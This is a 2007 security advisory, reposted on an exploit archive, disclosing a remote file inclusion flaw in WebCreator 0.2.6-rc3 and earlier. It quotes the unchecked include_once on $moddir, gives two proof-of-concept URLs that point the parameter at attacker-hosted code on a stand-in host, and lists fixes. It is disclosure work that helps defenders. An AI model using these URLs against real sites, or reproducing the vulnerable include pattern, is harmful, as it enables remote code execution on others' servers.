Echo Security Advisory 2007.74

Echo Security Advisory 2007.74: Posted Mar 14, 2007; Authored by Echo Security, Dedi Dwianto | Site advisories.echo.or.id; WebCreator versions 0.2.6-rc3 and below suffer from a remote file inclusion vulnerability.; tags | exploit, remote, file inclusion; SHA-256 | 01a11c5ebb2dd9ff9c829e9ace85beb06551738ea987600e13706cb6e3c11bc4; Download | Favorite | View

Echo Security Advisory 2007.74

____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_74$2007

-------------------------------------------------------------------------------------
[ECHO_ADV_74$2007] WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability
-------------------------------------- ----------------------------------------------

Author    : Dedi Dwianto a.k.a the_day
Date Found  : March, 13th 2007
Location  : Indonesia, Jakarta
web    : http://advisories.echo.or.id/adv/adv74-theday-2007.txt
Critical Lvl  : Highly critical
Impact    : System access
Where    : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application  : WebCreator
version    : <= 0.2.6-rc3
URL    : http://webcreator.innoxia.cz/

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~

- Invalid include_once function at mods/content/load.inc.php
-----------------------mods/content/load.inc.php------------

<?
 include_once($moddir . '/functions.lib.php');
?>

----------------------------------------------------------

Input passed to the "$moddir" parameter in load.inc.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

also affected files :

config/load.inc.php
http/load.inc.php

and More ....



Proof Of Concept:
~~~~~~~~~~~~~

http://localhost/mods/config/load.inc.php?moddir=http://atacker.com/inject.txt?
http://localhost/mods/http/load.inc.php?moddir=http://atacker.com/inject.txt?


Solution:
~~~~~

- Sanitize variable $moddir affected files.
- Turn off register_globals

---------------------------------------------------------------------------

Shoutz:
~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy Nice Girl
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~
     EcHo Research & Development Center
     http://advisories.echo.or.id
     erdc[at]echo[dot]or[dot]id
     the_day[at]echo[dot]or[dot]id
     
-------------------------------- [ EOF ]----------------------------------

Top Authors In Last 30 Days

Red Hat 219 files
indoushka 83 files
Ubuntu 79 files
Gentoo 36 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,707)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,485)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,737)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

Echo Security Advisory 2007.74

Echo Security Advisory 2007.74

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Echo Security Advisory 2007.74

Share This

Echo Security Advisory 2007.74

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems